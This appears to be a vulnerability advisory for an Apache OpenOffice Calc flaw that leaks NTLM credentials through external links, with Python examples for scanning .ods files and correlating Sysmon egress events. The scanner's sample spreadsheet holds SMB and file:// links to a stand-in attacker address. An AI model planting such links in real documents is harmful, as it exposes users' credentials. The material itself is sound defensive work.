CVE-2025-64403

Apache · Apache Multiple Products

A high-severity vulnerability has been identified in Apache OpenOffice Calc that could allow an attacker to access sensitive information.

Executive summary

The flaw affects Apache OpenOffice Calc and can allow an attacker to access sensitive information. By tricking a user into opening a specially crafted spreadsheet file, an attacker can force the application to connect to an external location under the attacker's control, potentially exposing user credentials (on Windows, the user's NTLM authentication material) or internal network data. Organizations using Apache OpenOffice should prioritize applying the available security updates to mitigate this risk.

Vulnerability

This vulnerability exists in the way Apache OpenOffice Calc processes links to external data sources within a spreadsheet. An attacker can create a malicious spreadsheet file (.ods) containing a link to a remote, attacker-controlled resource (e.g., a malicious SMB share). When an unsuspecting user opens this file, Calc may attempt to resolve and connect to the external data source without the user's explicit consent. On Windows hosts, connecting to an attacker's SMB share starts NTLM authentication, which hands the logged-on user's NTLM challenge-response (loosely called the "NTLM hash") to the attacker; it can then be cracked offline or relayed to other services. Even where no authentication takes place, the connection itself tells the attacker the client's IP address and that the document was opened. This type of attack is typically delivered via phishing emails.
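The following scanner is an added example, not code from the page or from the Apache OpenOffice project. It unpacks an .ods (a zip archive) and lists every reference in content.xml that points at another host: table:table-source links, OpenFormula external references of the form ['smb://host/...'#$Sheet.A1], and xlink:href hyperlinks. The element and attribute names follow the ODF 1.2 schema; the sample document, the 203.0.113.5 address and the intranet.example host are constructed for this example. The page does not say which link types OpenOffice resolves automatically, so the scanner makes no such claim; it is a triage tool for inbound attachments and for building the egress allow-list.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
TABLE_FORMULA = "{urn:oasis:names:tc:opendocument:xmlns:table:1.0}formula"
# OpenFormula external reference: ['<source IRI>'#$Sheet.Cell]
FORMULA_SOURCE = re.compile(r"\['([^']+)'#")
# Schemes that make the application contact another host when the link is resolved.
REMOTE_SCHEMES = {"smb", "http", "https", "ftp", "webdav", "webdavs", "dav", "davs"}


def is_remote_target(target):
    """True for UNC paths, file://host/... and network URL schemes; False for local or in-document refs."""
    if target.startswith("\\\\"):          # UNC path, resolved over SMB on Windows
        return True
    parsed = urlparse(target)
    if parsed.scheme.lower() == "file":
        return bool(parsed.netloc)         # file://server/share is remote, file:///C:/... is local
    return parsed.scheme.lower() in REMOTE_SCHEMES


def scan_ods_external_links(ods_bytes):
    """Return (element, target) pairs for every link in content.xml that points at another host."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(ods_bytes)) as zf:
        root = ET.fromstring(zf.read("content.xml"))
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1]  # strip the namespace, keep the local name
        href = elem.attrib.get(XLINK_HREF)
        if href and is_remote_target(href):
            findings.append((tag, href))
        for src in FORMULA_SOURCE.findall(elem.attrib.get(TABLE_FORMULA, "")):
            if is_remote_target(src):
                findings.append((tag + "@formula", src))
    return findings


def build_sample_ods(content_xml):
    """Assemble a minimal .ods: a zip whose first entry is a stored 'mimetype', then content.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(zipfile.ZipInfo("mimetype"),
                    "application/vnd.oasis.opendocument.spreadsheet",
                    compress_type=zipfile.ZIP_STORED)
        zf.writestr("content.xml", content_xml)
    return buf.getvalue()


# Constructed content.xml: one linked sheet, one external formula, one hyperlink, two local references.
SAMPLE_CONTENT_XML = """<?xml version="1.0" encoding="UTF-8"?>
<office:document-content
  xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
  xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0"
  xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"
  xmlns:xlink="http://www.w3.org/1999/xlink" office:version="1.2">
 <office:body><office:spreadsheet>
  <table:table table:name="Sheet1">
   <table:table-source xlink:href="smb://203.0.113.5/share/data.ods" table:mode="copy-all"/>
   <table:table-row>
    <table:table-cell table:formula="of:=['file://203.0.113.5/share/q.ods'#$Sheet1.A1]"/>
    <table:table-cell table:formula="of:=['file:///C:/Users/me/local.ods'#$Sheet1.A1]"/>
    <table:table-cell><text:p><text:a xlink:href="https://intranet.example/report">report</text:a></text:p></table:table-cell>
    <table:table-cell><text:p><text:a xlink:href="#Sheet1.A1">same sheet</text:a></text:p></table:table-cell>
   </table:table-row>
  </table:table>
 </office:spreadsheet></office:body>
</office:document-content>
"""

if __name__ == "__main__":
    for element, target in scan_ods_external_links(build_sample_ods(SAMPLE_CONTENT_XML)):
        print(f"{element:20s} -> {target}")
```

Run it against real attachments by passing the file bytes to scan_ods_external_links; anything it reports that is not on your list of approved internal shares and hosts is a candidate for blocking at the mail gateway or for a closer look.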

Business impact

This is a High severity vulnerability with a CVSS score of 8.1, posing a significant risk to the organization. Successful exploitation could lead to the compromise of user credentials, which attackers can then use for initial access or lateral movement within the corporate network. The primary business impacts include the potential for a data breach, loss of confidential information, and unauthorized access to network resources. A successful attack could result in significant reputational damage and financial costs associated with incident response and recovery.

Remediation

Immediate Action: The primary remediation is to apply the security updates provided by Apache across all affected systems immediately. Prioritize patching workstations where Apache OpenOffice is installed. After patching, continue to monitor systems for any signs of attempted exploitation by reviewing relevant logs for suspicious activity.

Proactive Monitoring: Security teams should monitor for unusual outbound network connections that follow the opening of a spreadsheet document. The key indicator is outbound SMB traffic (TCP/445, or TCP/139 for NetBIOS session) from workstations to external IP addresses, which points to an NTLM hash theft attempt. Note that on Windows the SMB connection triggered by a UNC or SMB link is made by the kernel's SMB redirector, so endpoint telemetry (for example Sysmon network-connection events) attributes it to the System process rather than to soffice.bin; correlate the egress with a preceding soffice.bin process start on the same host instead of filtering on the OpenOffice process alone. Also watch for HTTP (TCP/80) connections from svchost.exe shortly afterwards, which is the WebClient service falling back to WebDAV when SMB is blocked. Direct connections from soffice.bin to unknown or untrusted domains after a user opens a document are still worth alerting on. Review endpoint and firewall logs for connections to unknown or untrusted destinations initiated after a spreadsheet is opened.
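As an added example (not from the page, not a detection shipped by any vendor), the following Python applies that correlation to Sysmon-style events: it flags SMB/NetBIOS egress to external addresses from any process, raises the severity when soffice.bin started on the same host within the previous minute, flags the WebDAV fallback from svchost.exe only when correlated (to keep port 80 noise down), and flags any external connection made by soffice.bin itself. The internal address ranges, the install path, the host names, addresses and timestamps are all constructed for this example; the organization's own ranges are listed explicitly rather than using ipaddress.is_private, which also treats documentation ranges such as 203.0.113.0/24 as private.

```python
import ipaddress
from datetime import datetime, timedelta

# Ranges this (hypothetical) organization treats as internal; anything else is external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
SMB_PORTS = {445, 139}            # SMB direct-host and NetBIOS session
WEBDAV_PORTS = {80}               # WebClient fallback Windows tries when SMB is blocked
WINDOW = timedelta(seconds=60)    # correlate egress with soffice.bin starts this recent
TIME_FMT = "%Y-%m-%d %H:%M:%S"


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def basename(image):
    # Sysmon reports the kernel as the bare string "System"; real paths are reduced to the file name.
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect_leak_attempts(events):
    """Scan Sysmon-style events (EventID 1 = process create, 3 = network connection).

    Returns (host, rule, destination, severity) tuples in time order.
    """
    alerts = []
    office_starts = {}  # host -> times at which soffice.bin was started
    for ev in sorted(events, key=lambda e: e["UtcTime"]):  # fixed-width timestamps sort lexically
        host, image = ev["Computer"], basename(ev["Image"])
        t = datetime.strptime(ev["UtcTime"], TIME_FMT)
        if ev["EventID"] == 1:
            if image == "soffice.bin":
                office_starts.setdefault(host, []).append(t)
            continue
        if ev["EventID"] != 3 or not is_external(ev["DestinationIp"]):
            continue
        port = int(ev["DestinationPort"])
        dest = "%s:%d" % (ev["DestinationIp"], port)
        recent = any(timedelta(0) <= t - s <= WINDOW for s in office_starts.get(host, []))
        if image == "soffice.bin":
            # Non-Windows builds (and HTTP fetches on Windows) connect from the office process itself.
            alerts.append((host, "office_process_external_connection", dest, "high"))
        elif port in SMB_PORTS:
            # On Windows the SMB redirector connects as "System", so do not filter on the process.
            alerts.append((host, "smb_egress", dest, "high" if recent else "medium"))
        elif port in WEBDAV_PORTS and recent:
            alerts.append((host, "webdav_fallback_after_office_start", dest, "high"))
    return alerts


# Constructed sample telemetry (hosts, paths, addresses and times are made up for this example).
OFFICE = "C:\\Program Files (x86)\\OpenOffice 4\\program\\soffice.bin"
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "UtcTime": "2025-11-12 09:00:00", "Image": OFFICE,
     "CommandLine": OFFICE + " C:\\Users\\me\\Downloads\\invoice.ods"},
    {"EventID": 3, "Computer": "WS01", "UtcTime": "2025-11-12 09:00:03", "Image": "System",
     "DestinationIp": "203.0.113.5", "DestinationPort": 445},          # SMB to the internet
    {"EventID": 3, "Computer": "WS01", "UtcTime": "2025-11-12 09:00:04", "Image": "System",
     "DestinationIp": "10.0.0.20", "DestinationPort": 445},            # internal file server, benign
    {"EventID": 3, "Computer": "WS01", "UtcTime": "2025-11-12 09:00:35",
     "Image": "C:\\Windows\\System32\\svchost.exe",
     "DestinationIp": "203.0.113.5", "DestinationPort": 80},           # WebDAV fallback
    {"EventID": 3, "Computer": "WS02", "UtcTime": "2025-11-12 09:10:00", "Image": OFFICE,
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},         # office process itself
    {"EventID": 3, "Computer": "WS03", "UtcTime": "2025-11-12 09:20:00", "Image": "System",
     "DestinationIp": "203.0.113.9", "DestinationPort": 445},          # no office start nearby
]

if __name__ == "__main__":
    for alert in detect_leak_attempts(SAMPLE_EVENTS):
        print(alert)
```

The medium-severity "smb_egress" without a nearby office start is kept on purpose: SMB to the internet from a workstation is worth a ticket whatever triggered it, and the same rule will catch the equivalent leak from other document formats.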

Compensating Controls: If immediate patching is not feasible, implement the following controls to reduce risk:

  • Network Egress Filtering: Block outbound SMB and NetBIOS traffic (TCP/445, TCP/139, UDP/137-138) from user workstations to the internet, at the network perimeter and in the host firewall. Be aware that when SMB is blocked, Windows can fall back to WebDAV over HTTP (TCP/80) through the WebClient service, so this control alone does not close the channel; disable the WebClient service where WebDAV is not needed, and watch for the fallback in proxy logs.
  • User Awareness Training: Advise users to be cautious of opening unsolicited spreadsheet files from external sources and to never enable external content or update links from an untrusted document. Setting Tools > Options > OpenOffice Calc > General > Update links when opening to "Never" reduces general exposure to link updates, but it should not be relied on as a fix for this CVE; patching is the remedy.
  • Endpoint Security: Ensure Endpoint Detection and Response (EDR) tools are configured to detect and alert on suspicious process behaviors, such as office productivity software making unexpected network connections.

Exploitation status

Public Exploit Available: false

Analyst recommendation

Given the high severity (CVSS 8.1) and the potential for credential theft, we recommend that organizations treat this vulnerability with urgency. The primary course of action is to apply the vendor-supplied patches to all systems running vulnerable versions of Apache OpenOffice immediately. Although this CVE is not currently on the CISA KEV list, its impact warrants immediate attention. In addition to patching, implementing compensating controls, such as blocking outbound SMB traffic, will provide a critical defense-in-depth layer against this and similar attack vectors.